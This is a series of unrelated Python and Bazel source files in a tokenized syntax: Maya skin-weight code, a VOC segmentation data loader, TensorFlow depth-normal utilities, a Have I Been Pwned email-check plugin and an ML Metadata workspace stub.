influenceIndices=om.MIntArray()<line_sep>[influenceIndices.append(self.getPhysicalInfluenceIndex(inf))<for>inf data.getInfluences()]<line_sep># Construct weights weights=om.MDoubleArray()<line_sep>[weights.append(w)<for>w data.getWeights()]<line_sep>oldValues=om.MDoubleArray()<line_sep>self.fn.getWeights(dagPath components influenceIndices oldValues)<line_sep>self.fn.setWeights(dagPath components influenceIndices weights normalize oldValues)<block_end>#---------------------------------------------------------------------- <def_stmt>flushWeights self influence<block_start>""" Args: influence (str) """<line_sep>weightData=self.getInfluenceData(influence)<line_sep>skinData=SkinWeightData(weightData.getElements() [influence] weightData.getWeights())<line_sep>[skinData.addInfluence(comp influence 0.0)<for>comp skinData.getComponents()]<line_sep>self.setWeightData(skinData)<block_end>#---------------------------------------------------------------------- <def_stmt>getInfluenceTransforms self space=om.MSpace.kObject<block_start>infs=self.listInfluences()<if_stmt>space<eq>om.MSpace.kWorld<block_start><return>[infs[i].inclusiveMatrix()<for>i xrange(infs.length())]<block_end><return>[om.MFnTransform(infs[i]).transformation().asMatrix()<for>i xrange(infs.length())]<block_end><block_end>
# -*- coding: utf-8 -*- # @Time : 2018/9/21 17:21 # @Author : HLin # @Email : <EMAIL> # @File : Voc_Dataset.py # @Software: PyCharm <import_stmt>PIL<import_stmt>random<import_stmt>scipy.io<import_from_stmt>PIL Image ImageOps ImageFilter<import_stmt>numpy<as>np<import_stmt>cv2<import_stmt>os<import_stmt>torch<import_stmt>torch.utils.data<as>data<import_stmt>torchvision.transforms<as>ttransforms<class_stmt>Voc_Dataset(data.Dataset)<block_start><def_stmt>__init__ self root_path='/data/linhua/VOCdevkit' dataset='voc2012_aug' base_size=513 crop_size=513 is_training=<true><block_start>""" :param root_path: :param dataset: :param base_size: :param is_trainging: :param transforms: """<line_sep>self.dataset=dataset<line_sep>self.is_training=is_training<line_sep>self.base_size=base_size<line_sep>self.crop_size=crop_size<if_stmt>self.dataset<eq>'voc2007'<block_start>self.data_path=os.path.join(root_path "VOC2007")<if_stmt>is_training<block_start>item_list_filepath=os.path.join(self.data_path "ImageSets/Segmentation/trainval.txt")<block_end><else_stmt><block_start>item_list_filepath=os.path.join(self.data_path "ImageSets/Segmentation/test.txt")<block_end><block_end><elif_stmt>self.dataset<eq>'voc2012'<block_start>self.data_path=os.path.join(root_path "VOC2012")<if_stmt>is_training<block_start>item_list_filepath=os.path.join(self.data_path "ImageSets/Segmentation/train.txt")<block_end><else_stmt><block_start>item_list_filepath=os.path.join(self.data_path "ImageSets/Segmentation/val.txt")<block_end><block_end><elif_stmt>self.dataset<eq>'voc2012_aug'<block_start>self.data_path=os.path.join(root_path "VOC2012")<if_stmt>is_training<block_start>item_list_filepath=os.path.join(self.data_path "ImageSets/Segmentation/train_aug.txt")<block_end><else_stmt><block_start>item_list_filepath=os.path.join(self.data_path "ImageSets/Segmentation/val_aug.txt")<block_end><block_end><else_stmt><block_start><raise>Warning("dataset must be voc2007 or voc2012 or voc2012_aug")<block_end>self.image_filepath=os.path.join(self.data_path "JPEGImages")<line_sep>self.gt_filepath=os.path.join(self.data_path "SegmentationClassAug")<line_sep>self.items=[id.strip()<for>id open(item_list_filepath)]<line_sep>self.classes=['aeroplane' 'bicycle' 'bird' 'boat' 'bottle' 'bus' 'car' 'cat' 'chair' 'cow' 'diningtable' 'dog' 'horse' 'motorbike' 'person' 'pottedplant' 'sheep' 'sofa' 'train' 'tvmonitor']<block_end><def_stmt>__getitem__ self item<block_start>id=self.items[item]<line_sep>gt_image_path=os.path.join(self.gt_filepath "{}.png".format(id))<line_sep>gt_image=Image.open(gt_image_path)<line_sep>image_path=os.path.join(self.image_filepath "{}.jpg".format(id))<line_sep>image=Image.open(image_path).convert("RGB")<if_stmt>self.is_training<block_start>image,gt_image=self._train_sync_transform(image gt_image)<block_end><else_stmt><block_start>image,gt_image=self._val_sync_transform(image gt_image)<block_end><return>image gt_image id<block_end><def_stmt>_train_sync_transform self img mask<block_start>''' :param image: PIL input image :param gt_image: PIL input gt_image :return: '''<line_sep># random mirror <if_stmt>random.random()<l>0.5<block_start>img=img.transpose(Image.FLIP_LEFT_RIGHT)<line_sep>mask=mask.transpose(Image.FLIP_LEFT_RIGHT)<block_end>crop_size=self.crop_size<line_sep># random scale (short edge) short_size=random.randint(int(self.base_size<times>0.5) int(self.base_size<times>2.0))<line_sep>w,h=img.size<if_stmt>h<g>w<block_start>ow=short_size<line_sep>oh=int(1.0<times>h<times>ow/w)<block_end><else_stmt><block_start>oh=short_size<line_sep>ow=int(1.0<times>w<times>oh/h)<block_end>img=img.resize((ow oh) Image.BILINEAR)<line_sep>mask=mask.resize((ow oh) Image.NEAREST)<line_sep># pad crop <if_stmt>short_size<l>crop_size<block_start>padh=crop_size-oh<if>oh<l>crop_size<else>0<line_sep>padw=crop_size-ow<if>ow<l>crop_size<else>0<line_sep>img=ImageOps.expand(img border=(0 0 padw padh) fill=0)<line_sep>mask=ImageOps.expand(mask border=(0 0 padw padh) fill=0)<block_end># random crop crop_size w,h=img.size<line_sep>x1=random.randint(0 w-crop_size)<line_sep>y1=random.randint(0 h-crop_size)<line_sep>img=img.crop((x1 y1 x1+crop_size y1+crop_size))<line_sep>mask=mask.crop((x1 y1 x1+crop_size y1+crop_size))<line_sep># gaussian blur as in PSP <if_stmt>random.random()<l>0.5<block_start>img=img.filter(ImageFilter.GaussianBlur(radius=random.random()))<block_end># final transform img,mask=self._img_transform(img) self._mask_transform(mask)<line_sep><return>img mask<block_end><def_stmt>_val_sync_transform self img mask<block_start>outsize=self.crop_size<line_sep>short_size=outsize<line_sep>w,h=img.size<if_stmt>w<g>h<block_start>oh=short_size<line_sep>ow=int(1.0<times>w<times>oh/h)<block_end><else_stmt><block_start>ow=short_size<line_sep>oh=int(1.0<times>h<times>ow/w)<block_end>img=img.resize((ow oh) Image.BILINEAR)<line_sep>mask=mask.resize((ow oh) Image.NEAREST)<line_sep># center crop w,h=img.size<line_sep>x1=int(round((w-outsize)/2.))<line_sep>y1=int(round((h-outsize)/2.))<line_sep>img=img.crop((x1 y1 x1+outsize y1+outsize))<line_sep>mask=mask.crop((x1 y1 x1+outsize y1+outsize))<line_sep># final transform img,mask=self._img_transform(img) self._mask_transform(mask)<line_sep><return>img mask<block_end><def_stmt>_img_transform self image<block_start>image_transforms=ttransforms.Compose([ttransforms.ToTensor() ttransforms.Normalize([.485 .456 .406] [.229 .224 .225]) ])<line_sep>image=image_transforms(image)<line_sep><return>image<block_end><def_stmt>_mask_transform self gt_image<block_start>target=np.array(gt_image).astype('int32')<line_sep>target=torch.from_numpy(target)<line_sep><return>target<block_end><def_stmt>__len__ self<block_start><return>len(self.items)<block_end><block_end><class_stmt>VOCDataLoader()<block_start><def_stmt>__init__ self args<block_start>self.args=args<line_sep>train_set=Voc_Dataset(dataset=self.args.dataset base_size=self.args.base_size crop_size=self.args.crop_size is_training=<true>)<line_sep>val_set=Voc_Dataset(dataset=self.args.dataset base_size=self.args.base_size crop_size=self.args.crop_size is_training=<false>)<line_sep>self.train_loader=data.DataLoader(train_set batch_size=self.args.batch_size shuffle=<true> num_workers=self.args.data_loader_workers pin_memory=self.args.pin_memory drop_last=<true>)<line_sep>self.valid_loader=data.DataLoader(val_set batch_size=self.args.batch_size shuffle=<false> num_workers=self.args.data_loader_workers pin_memory=self.args.pin_memory drop_last=<true>)<line_sep>self.train_iterations=(len(train_set)+self.args.batch_size)<floordiv>self.args.batch_size<line_sep>self.valid_iterations=(len(val_set)+self.args.batch_size)<floordiv>self.args.batch_size<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>data=scipy.io.loadmat('/data/linhua/VOCdevkit/BSD/dataset/cls/2008_003846.mat')<line_sep>print(data['GTcls']["Segmentation"][0 0])<line_sep>print(np.array([[(1 2 3)]]).shape)<line_sep>print(np.array([[np.array(1) np.array(2) np.array(3)]]).shape)<block_end>
<import_stmt>numpy<as>np<import_stmt>sys<import_stmt>tensorflow<as>tf<line_sep>slim=tf.contrib.slim<def_stmt>convertNHWC2NCHW data name<block_start>out=tf.transpose(data [0 3 1 2] name=name)<line_sep><return>out<block_end><def_stmt>convertNCHW2NHWC data name<block_start>out=tf.transpose(data [0 2 3 1] name=name)<line_sep><return>out<block_end><def_stmt>denormalize batch_input low_thres up_thres zero2one=<false> rm_zeros=<false> eps=10.0# denormalize depth from [-1, 1] to real depth. <block_start><if_stmt><not>zero2one# [-1, 1] <block_start>rel_input=(batch_input+1.0)/2.0<block_end><else_stmt># [0, 1] <block_start>rel_input=batch_input<block_end>denormalized=rel_input<times>(up_thres-low_thres)+low_thres<if_stmt>rm_zeros<block_start>low_mask=tf.less(denormalized low_thres+eps name='low_mask')<line_sep>zero_const=tf.zeros_like(denormalized)<line_sep>denormalized=tf.where(low_mask zero_const denormalized)<block_end><return>denormalized<block_end><def_stmt>compute_normals depth config conv=<false> eps=1e-4# convert NHWC depth to NCHW normal <block_start><with_stmt>tf.variable_scope("depth_to_normal")<block_start>intrinsics=tf.constant([[536.628/640.0 536.606/480.0 310.591/640.0 234.759/480.0]])<line_sep>intrinsics=tf.tile(intrinsics [config.batch_size 1])<line_sep>depth_real=convertNHWC2NCHW(denormalize(depth low_thres=config.low_thres up_thres=config.up_thres) name='depth_NCHW')<line_sep>normals=depth_to_normals_tf(depth_real intrinsics)<if_stmt>conv<block_start>kernel_size=3<line_sep>stride=1<line_sep>in_channels=normals.get_shape()[1]<assert_stmt>in_channels<eq>3 'normals should have 3 channel instead of {}.'.format(in_channels)<line_sep>normal_filter=tf.get_variable("filter" [kernel_size kernel_size 1 1] dtype=tf.float32 initializer=tf.constant_initializer(1.0/(kernel_size<times>kernel_size)) trainable=<false>)<line_sep>normals1,normals2,normals3=tf.split(convertNCHW2NHWC(normals 'normals_NHWC') 3 axis=3)<line_sep>normals1=tf.nn.conv2d(normals1 normal_filter [1 stride stride 1] 'SAME' name='normal_conv_r')<line_sep>normals2=tf.nn.conv2d(normals2 normal_filter [1 stride stride 1] 'SAME' name='normal_conv_g')<line_sep>normals3=tf.nn.conv2d(normals3 normal_filter [1 stride stride 1] 'SAME' name='normal_conv_b')<line_sep>normals=tf.concat([normals1 normals2 normals3] 3)<line_sep>unused=tf.less(tf.norm(normals axis=3) np.sqrt(eps))<line_sep>unused=tf.stack([unused]<times>3 axis=3)<line_sep>normals=tf.nn.l2_normalize(normals 3 epsilon=eps name='normalize_normals')<line_sep>normals=tf.where(unused tf.zeros_like(normals) normals)<line_sep>normals=convertNHWC2NCHW(normals name='normals_NCHW')<block_end><return>normals<block_end><block_end><def_stmt>depth_to_normals_tf depth intrinsics scope=<none> eps=1e-4<block_start>""" :param depth: real depth (B,1,H,W) :param intrinsics: (B,4) :return: normals (B,3,H,W) """<with_stmt>tf.name_scope(scope 'depth_to_normals_tf' [depth intrinsics])<block_start>H,W=depth.shape.as_list()[-2:]<line_sep>B=tf.shape(depth)[0]# config.batch_size depth=tf.reshape(depth [B H W])<line_sep># fx_rel = fx_abs / W, cx_real = cx_abs / W fx,fy,cx,cy=tf.split(tf.expand_dims(intrinsics 2) 4 axis=1)# (B,1,1) inv_fx=tf.div(1.0 fx<times>W)<line_sep>inv_fy=tf.div(1.0 fy<times>H)<line_sep>cx=cx<times>W<line_sep>cy=cy<times>H<line_sep>X,Y=tf.meshgrid(tf.range(W) tf.range(H))<line_sep>X=tf.cast(tf.tile(tf.expand_dims(X axis=0) [B 1 1]) tf.float32)# (B,H,W) Y=tf.cast(tf.tile(tf.expand_dims(Y axis=0) [B 1 1]) tf.float32)<line_sep>x_cord=(X-cx)<times>inv_fx<times>depth<line_sep>y_cord=(Y-cy)<times>inv_fy<times>depth<line_sep>p=tf.stack([x_cord y_cord depth] axis=3 name='p_3d')# (B,H,W,3) # vector of p_3d in west, south, east, north direction p_ctr=p[: 1:-1 1:-1 :]<line_sep>vw=p_ctr-p[: 1:-1 2: :]<line_sep>vs=p[: 2: 1:-1 :]-p_ctr<line_sep>ve=p_ctr-p[: 1:-1 :-2 :]<line_sep>vn=p[: :-2 1:-1 :]-p_ctr<line_sep>normal_1=tf.cross(vs vw name='cross_1')# (B,H-2,W-2,3) normal_2=tf.cross(vn ve name='cross_2')<line_sep>normal_1=tf.nn.l2_normalize(normal_1 3 epsilon=eps)<line_sep>normal_2=tf.nn.l2_normalize(normal_2 3 epsilon=eps)<line_sep>normal=normal_1+normal_2<line_sep># unused = tf.less(tf.norm(normal, axis=3), np.sqrt(eps)) # unused = tf.stack([unused] * 3, axis=3) normal=tf.nn.l2_normalize(normal 3 epsilon=eps name='normal')<line_sep># normal = tf.where(unused, tf.zeros_like(normal), normal) paddings=[[0 0] [1 1] [1 1] [0 0]]<line_sep>normal=tf.pad(normal paddings)# (B,H,W,3) normal=convertNHWC2NCHW(normal 'normal_NCHW')<line_sep><return>normal<block_end><block_end><def_stmt>instance_norm input<block_start><with_stmt>tf.variable_scope("instance_norm")<block_start>input=tf.identity(input)<line_sep>channels=input.get_shape()[3]<line_sep>shift=tf.get_variable("shift" [channels] dtype=tf.float32 initializer=tf.zeros_initializer())<line_sep>scale=tf.get_variable("scale" [channels] dtype=tf.float32 initializer=tf.random_normal_initializer(1.0 0.02))<line_sep>mean,variance=tf.nn.moments(input [1 2] keep_dims=<true>)<line_sep>variance_epsilon=1e-5<line_sep>normalized=tf.nn.batch_normalization(input mean variance shift scale variance_epsilon=variance_epsilon name='instancenorm')<line_sep><return>normalized<block_end><block_end>@slim.add_arg_scope<def_stmt>lrelu inputs leak=0.2 scope="lrelu"<block_start>""" For tf > 1.4, use tf.nn.leaky_relu() decorate a func with slim.add_arg_scope so that it can be used within an arg_scope in a slim way. """<with_stmt>tf.variable_scope(scope)<block_start>f1=0.5<times>(1+leak)<line_sep>f2=0.5<times>(1-leak)<line_sep><return>f1<times>inputs+f2<times>abs(inputs)<block_end><block_end><def_stmt>conv_bn_relu batch_input kernel_size stride out_channels=<none><block_start><with_stmt>tf.variable_scope("conv_bn_relu")<block_start>in_channels=batch_input.get_shape()[3]<if_stmt><not>out_channels<block_start>out_channels=in_channels<block_end>filter=tf.get_variable("filter" [kernel_size kernel_size in_channels out_channels] dtype=tf.float32 initializer=tf.random_normal_initializer(0 0.02))<line_sep>convolved=tf.nn.conv2d(batch_input filter [1 stride stride 1] padding="SAME")<line_sep>normed=batchnorm_u(convolved)<line_sep>rectified=tf.nn.relu(normed)<line_sep><return>rectified filter<block_end><block_end><def_stmt>resize_conv x out_ch k_size size_factor<block_start>_,in_h,in_w,in_ch=x.shape.as_list()<line_sep>resized=tf.image.resize_nearest_neighbor(x [in_h<times>size_factor in_w<times>size_factor])<line_sep>conv=conv_act(resized out_ch k_size 1)<line_sep><return>conv<block_end><def_stmt>resize_add_conv_u input size_factor out_ch=<none> k_size=3 axis=3 act=tf.nn.relu<block_start>""" Bilinear Additive Upsampling. see: Wojna, Zbigniew, et al. "The Devil is in the Decoder." arXiv preprint arXiv:1707.05847 (2017). """<with_stmt>tf.variable_scope("resize_add_conv")<as>scp<block_start>_,in_height,in_width,in_ch=input.shape.as_list()<if_stmt>out_ch<block_start><assert_stmt>in_ch%out_ch<eq>0 'cannot add in_ch: {} to out_ch: {}'.format(in_ch out_ch)<block_end><else_stmt><block_start>out_ch,r=divmod(in_ch (size_factor<times>size_factor))<assert_stmt>r<eq>0 'in_ch: {} not divisible by size_factor^2'.format(in_ch)<block_end>ch_split=in_ch/out_ch<line_sep># bilinear upsample resized=tf.image.resize_images(input [in_height<times>size_factor in_width<times>size_factor])<line_sep>stack_list=[]<for_stmt>i range(out_ch)<block_start>resized_split=resized[: : : i<times>ch_split:(i+1)<times>ch_split]<line_sep>stack_list.append(tf.reduce_sum(resized_split axis=axis))<block_end>stacked=tf.stack(stack_list axis=axis)<line_sep>filter=tf.get_variable("filter" [k_size k_size out_ch out_ch] dtype=tf.float32 initializer=tf.random_normal_initializer(0 0.02))<line_sep>conv=tf.nn.conv2d(stacked filter [1 1 1 1] padding="SAME")<if_stmt>act<is><not><none><block_start>conv=tf.nn.relu(conv)<block_end><return>conv<block_end><block_end><def_stmt>conv_concat input skip axis conv=<true><block_start><with_stmt>tf.variable_scope("concat")<block_start>in_ch=input.shape[3]<if_stmt>conv<block_start>skip,_=conv_bn_relu(skip 3 1 out_channels=in_ch)<block_end><return>tf.concat([input skip] axis)<block_end><block_end><def_stmt>resize_like inputs ref method='NN'<block_start>iH,iW=inputs.shape[1] inputs.shape[2]<line_sep>rH,rW=ref.shape[1] ref.shape[2]<if_stmt>iH<eq>rH<and>iW<eq>rW<block_start><return>inputs<block_end><if_stmt>method<eq>'NN'<block_start><return>tf.image.resize_nearest_neighbor(inputs [rH.value rW.value])<block_end><elif_stmt>method<eq>'BI'<block_start><return>tf.image.resize_bilinear(inputs [rH.value rW.value])<block_end><else_stmt><block_start><raise>NotImplementedError('resize method not implemented yet.')<block_end><block_end><def_stmt>residual_block inputs ch_out stride=1 norm_fn=slim.batch_norm outputs_collections=<none> scope=<none><block_start>""" Residual_block with pre-activation. see resnet_model.py for more detailed version. """<with_stmt>tf.variable_scope(scope "residual_block")<as>scp<block_start>shortcut=tf.identity(inputs name="shortcut")<if_stmt>norm_fn<block_start>preact=norm_fn(inputs activation_fn=tf.nn.relu scope="preact")<block_end><else_stmt><block_start>preact=tf.nn.relu(inputs name="preact")<block_end>residual=slim.conv2d(preact ch_out [3 3] stride=stride normalizer_fn=norm_fn activation_fn=tf.nn.relu scope="conv1")<line_sep>residual=slim.conv2d(residual ch_out [3 3] stride=stride normalizer_fn=<none> activation_fn=<none> scope="conv2")<line_sep>output=shortcut+residual<block_end><return>output<block_end><def_stmt>rand_shift_depth depths low_th up_th seed=666<block_start>""" :param depths: list of depth maps to be randomly shifted together. depths values shoud be in range [low_th, up_th] :return: list of shifted depth maps """<if_stmt>len(depths)<g>1<block_start>depth_ref=depths[1]<block_end><else_stmt><block_start>depth_ref=depths[0]<block_end>ref_min=tf.reduce_min(depth_ref)<line_sep>ref_max=tf.reduce_max(depth_ref)<line_sep>shift_min=low_th-ref_min<line_sep>shift_max=up_th-ref_max<line_sep>shift_val=tf.random_uniform([] minval=shift_min maxval=shift_max seed=seed name='shift_val')<line_sep>depths_shifted=[tf.clip_by_value(d+shift_val low_th up_th)<for>d depths]<line_sep><return>depths_shifted<block_end><def_stmt>read_image_from_filename filename batch_size num_threads=4 has_mask=<true> has_abd=<false> aux_type="JPEG" depth_type=tf.uint16 low_th=500.0 up_th=3000.0 diff_th=5.0 output_height=256 output_width=256 min_after_dequeue=128 use_shuffle_batch=<false> rand_crop=<true> rand_scale=<false> rand_depth_shift=<false> rand_flip=<true> rand_brightness=<true> scope=<none><block_start>""" :param filename: index csv file for training. :param batch_size: 16 or 32 recommended for Titan X. :param num_threads: 4 or 8. :param has_mask: single channel [0, 255]. offline mask obtained by threshold, instance segmentation or other methods. :param has_abd: offline albedo obtained by intrinsic decomposition methods, if False assume uniform albedo. :param aux_type: auxiliary(e.g. color) image file type. :param depth_type: data type of depth maps. :param low_th: limited lower bound of depth range. :param up_th: limited upper bound of depth range. :param diff_th: threshold to reject bad training pairs with large L1 diff. :param output_height: patch height. :param output_width: patch width. :param min_after_dequeue: see docs of tf.train.shuffle_batch. :param use_shuffle_batch: see docs of tf.train.shuffle_batch. :param rand_crop: random cropping patches for training, change cx, cy. :param rand_flip: random flipping patches, change cx, cy. :param rand_scale: random scaling, change fx, fy, cx, cy. :param rand_depth_shift: only shift depth value, no change in intrinsics. :param rand_brightness: augment color image. :param scope: visualize graphs in tensorboard. :return: depth_raw_batch, depth_ref_batch, color_batch, mask_batch, albedo_batch """<with_stmt>tf.variable_scope(scope "image_producer")# Load index csv file <block_start>textReader=tf.TextLineReader()<line_sep>csv_path=tf.train.string_input_producer([filename] shuffle=<true>)<line_sep>_,csv_content=textReader.read(csv_path)<if_stmt>has_mask<and>has_abd<block_start>depth_raw_filename,depth_ref_filename,color_filename,mask_filename,albedo_filename=tf.decode_csv(csv_content [[""] [""] [""] [""] [""]])<block_end><elif_stmt>has_mask<block_start>depth_raw_filename,depth_ref_filename,color_filename,mask_filename=tf.decode_csv(csv_content [[""] [""] [""] [""]])<block_end><else_stmt><block_start>depth_raw_filename,depth_ref_filename,color_filename=tf.decode_csv(csv_content [[""] [""] [""]])<block_end># Read and decode image data to tf.float32 tensor depth_raw_data=tf.read_file(depth_raw_filename)<line_sep>depth_ref_data=tf.read_file(depth_ref_filename)<line_sep>color_data=tf.read_file(color_filename)<line_sep>depth_raw_im=tf.image.decode_png(depth_raw_data channels=1 dtype=depth_type)<line_sep>depth_ref_im=tf.image.decode_png(depth_ref_data channels=1 dtype=depth_type)<if_stmt>has_mask<block_start>mask_data=tf.read_file(mask_filename)<line_sep>mask=tf.image.decode_png(mask_data channels=1)/255<line_sep>mask=tf.cast(mask tf.float32)<block_end><if_stmt>has_abd<block_start>albedo_data=tf.read_file(albedo_filename)<line_sep>albedo_im=tf.image.decode_png(albedo_data channels=1)<line_sep>albedo_im=tf.cast(albedo_im tf.float32)<block_end><if_stmt>aux_type<eq>"JPEG"<block_start>color_im=tf.image.decode_jpeg(color_data channels=1)<block_end><elif_stmt>aux_type<eq>"PNG"<block_start>color_im=tf.image.decode_png(color_data channels=1)<block_end><else_stmt><block_start><raise>NotImplementedError("unsupport auxiliary image type for now!")<block_end>depth_raw_im=tf.cast(depth_raw_im tf.float32)<line_sep>depth_ref_im=tf.cast(depth_ref_im tf.float32)<line_sep>color_im=tf.cast(color_im tf.float32)<line_sep># color_im = tf.image.resize_images(color_im, depth_raw_shape[:2], method=2) # return float Tensor # Concat all images in channel axis to randomly crop together <if_stmt>has_mask<and>has_abd<block_start>concated_im=tf.concat([depth_raw_im depth_ref_im color_im mask albedo_im] axis=2)<line_sep>n_concat=5<block_end><elif_stmt>has_mask<block_start>concated_im=tf.concat([depth_raw_im depth_ref_im color_im mask] axis=2)<line_sep>n_concat=4<block_end><else_stmt><block_start>concated_im=tf.concat([depth_raw_im depth_ref_im color_im] axis=2)<line_sep>n_concat=3<block_end># Prepose rand_crop here to reduce unnecessary computation of subsequent data augmentations. <if_stmt>rand_crop<block_start>concated_im=tf.random_crop(concated_im [output_height output_width n_concat])<line_sep># concated_im = tf.image.crop_to_bounding_box(concated_im, 80, 250, output_height, output_width) # dbg <block_end><else_stmt><block_start>concated_im=tf.image.resize_image_with_crop_or_pad(concated_im output_height output_width)<block_end><if_stmt>has_mask<and>has_abd<block_start>depth_raw_im,depth_ref_im,color_im,mask,albedo_im=tf.split(concated_im n_concat axis=2)<block_end><elif_stmt>has_mask<block_start>depth_raw_im,depth_ref_im,color_im,mask=tf.split(concated_im n_concat axis=2)<block_end><else_stmt><block_start>depth_raw_im,depth_ref_im,color_im=tf.split(concated_im 3 axis=2)<block_end># Filter bad inputs use diff_mean or mse n_holes=tf.count_nonzero(tf.less(depth_ref_im tf.constant(50.0)) dtype=tf.float32)<line_sep>diff=tf.abs(tf.subtract(depth_raw_im depth_ref_im name='diff'))<line_sep>diff=tf.where(diff<l>up_th/10 diff tf.zeros_like(diff))<line_sep>diff_mean=tf.reduce_mean(diff name='diff_mean')<line_sep># mse = tf.reduce_mean(tf.square(diff), name='mse') enqueue_cond=tf.logical_and(tf.less(n_holes output_height<times>output_width<times>2/3) tf.less(diff_mean diff_th))<def_stmt>zero_img <block_start><return>tf.constant(0 shape=[0 output_height output_width n_concat])<block_end><def_stmt>one_img # Data augmentation: rand_flip, rand_scale and rand_depth_shift on filtered patches. <block_start>raw=tf.clip_by_value(depth_raw_im low_th up_th)<line_sep>ref=tf.clip_by_value(depth_ref_im low_th up_th)<if_stmt>rand_brightness<block_start>color=tf.image.random_brightness(color_im 20)<block_end><else_stmt><block_start>color=color_im<block_end><if_stmt>rand_depth_shift<block_start>raw,ref=rand_shift_depth([raw ref] low_th up_th)<block_end><if_stmt>has_mask<and>has_abd<block_start>im=tf.concat([raw ref color mask abd] axis=2)<block_end><elif_stmt>has_mask<block_start>im=tf.concat([raw ref color mask] axis=2)<block_end><else_stmt><block_start>im=tf.concat([raw ref color] axis=2)<block_end><if_stmt>rand_flip<block_start>im=tf.image.random_flip_left_right(im)<block_end><if_stmt>rand_scale<block_start><pass><block_end><return>tf.expand_dims(im 0)<block_end>concated_im=tf.cond(enqueue_cond one_img zero_img)<line_sep>## Pass the 4D batch tensors to a batching op at the end of input data queue # shuffle_batch creates a shuffling queue with dequeue op and enqueue QueueRunner # min_after_dequeue defines how big a buffer we will randomly sample from # bigger means better shuffling but slower start up and more memory used. # capacity must be larger than min_after_dequeue and the amount larger # determines the maximum we will prefetch. # capacity = min_after_dequeue + (num_threads + small_safety_margin) * batch_size <if_stmt>use_shuffle_batch<block_start>capacity=min_after_dequeue+(num_threads+1)<times>batch_size<line_sep>im_batch=tf.train.shuffle_batch([concated_im] batch_size=batch_size capacity=capacity enqueue_many=<true> num_threads=num_threads min_after_dequeue=min_after_dequeue allow_smaller_final_batch=<true> name="shuffle_batch")<block_end><else_stmt><block_start>im_batch=tf.train.batch([concated_im] batch_size=batch_size num_threads=num_threads allow_smaller_final_batch=<true> enqueue_many=<true> name="batch")<block_end># Split concatenated data <if_stmt>has_mask<and>has_abd<block_start>depth_raw_batch,depth_ref_batch,color_batch,mask_batch,albedo_batch=tf.split(im_batch n_concat axis=3)<block_end><elif_stmt>has_mask<block_start>depth_raw_batch,depth_ref_batch,color_batch,mask_batch=tf.split(im_batch n_concat axis=3)<block_end><else_stmt># get mask only from ref(after clip, outliers are equal to low_th) <block_start>depth_raw_batch,depth_ref_batch,color_batch=tf.split(im_batch n_concat axis=3)<line_sep>mask_batch=tf.cast(tf.not_equal(depth_ref_batch low_th) tf.float32 name='mask_batch')<block_end># 0.0 or 1.0 # Normalize depth and color maps <with_stmt>tf.name_scope('normalize')<block_start>thres_range=(up_th-low_th)/2.0<line_sep>depth_raw_batch=(depth_raw_batch-low_th)/thres_range<line_sep>depth_raw_batch=tf.subtract(depth_raw_batch 1.0 name='raw_batch')# [low,up]->[-1,1] depth_ref_batch=(depth_ref_batch-low_th)/thres_range<line_sep>depth_ref_batch=tf.subtract(depth_ref_batch 1.0 name='ref_batch')# [low,up]->[-1,1] color_batch=color_batch<times>mask_batch/127.0<line_sep>color_batch=tf.subtract(color_batch 1.0 name='aux_batch')# [0,255]->[-1,1] <if_stmt>has_abd<block_start>albedo_batch=albedo_batch/127.0# offline estimated albedo from RGB, [0,255]->[0,2] <block_end><else_stmt><block_start>albedo_batch=<none><block_end><block_end># dbg: return and show last diff_mean in batch <return>depth_raw_batch depth_ref_batch color_batch mask_batch albedo_batch diff_mean<block_end><block_end>
<import_stmt>time<import_stmt>requests<import_from_stmt>core.utils.parser Parser<import_from_stmt>core.utils.helpers Helpers<import_from_stmt>core.models.plugin BasePlugin<class_stmt>HIBP(BasePlugin)<block_start><def_stmt>__init__ self args<block_start>self.args=args<line_sep>self.base_url="https://haveibeenpwned.com/api/v2/breachedaccount"<line_sep>self.url_parameters="truncateResponse=true&includeUnverified=true"<block_end><def_stmt>execute self data<block_start>Helpers.print_warning("Starting Have I Been Pwned plugin..." jumpline=<true>)<line_sep>all_emails=Parser(self.args).all_unique_emails(data)<if_stmt>all_emails<block_start>self.check_all_emails(all_emails)<line_sep><return><true><block_end><return><false><block_end><def_stmt>check_authors self authors<block_start><for_stmt>author authors<block_start>time.sleep(2)<line_sep>self.check_email(author.email)<block_end><block_end><def_stmt>check_all_emails self emails<block_start><for_stmt>email emails<block_start>time.sleep(2)<line_sep>self.check_email(email)<block_end><block_end><def_stmt>check_email self email<block_start><try_stmt><block_start>url="{}/{}?{}".format(self.base_url email self.url_parameters)<line_sep>r=requests.get(url)<if_stmt>r.status_code<eq>503<block_start>Helpers.print_error("hibp: IP got in DDoS protection by CloudFare")<block_end><elif_stmt>r.status_code<eq>429<block_start>Helpers.print_error("hibp: Throttled by HIBP API")<block_end><elif_stmt>r.text<block_start>r=r.json()<line_sep>print("\n{} leaks:".format(email))<for_stmt>leak r<block_start>print("\t- {}".format(leak["Name"]))<block_end><return><true><block_end><return><false><block_end><except_stmt>Exception<as>e<block_start>Helpers.print_error(e)<line_sep><return><false><block_end><block_end><block_end>
# Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ML METADATA Data Validation external dependencies that can be loaded in WORKSPACE files. """<line_sep>load("//ml_metadata:mysql_configure.bzl" "mysql_configure")<def_stmt>ml_metadata_workspace <block_start>"""All ML Metadata external dependencies."""<line_sep>mysql_configure()<block_end>
